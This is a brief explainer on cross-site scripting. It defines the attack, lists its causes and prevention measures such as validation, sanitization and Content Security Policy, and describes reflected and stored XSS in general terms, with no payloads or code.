What is Cross Site Scripting(XSS)?

XSS is an attack on web applications where the attacker injects malicious Javascript in the targeted website to capture confidential information of its users. Once the attacker injects malicious Javascript code in Website he can access cookies, user sessions and listen to events. Then this data will be forwarded to attackers servers to steal the users details.

What are causes of XSS attack?

• Consuming user supplied data without proper validations
• Consuming the data supplied by users without sanitization

How to prevent XSS attacks?

• Always validate user supplied data
• Add input validations on both Client and Server side
• Consume the data supplied by the user only after sanitization
• Enable Content Security Policy to prevent XSS attacks

What are different types of XSS?

Reflected XSS attack: In the reflected XSS attack, the attacker includes the malicious Javascript in the target website URL and forwards this URL to users of that website through emails, chats, forums etc. When the user click on the URL they received through email then browsers execute the Javascript code included in the URL. This malicious code now can access the cookies, DOM and send this data to the attacker's servers.

Stored XSS attack: In the stored XSS attack, the attacker stores the malicious Javascript code in the storages like Databases and this malicious code will be sent to users browsers through HTTP response and then gets executed.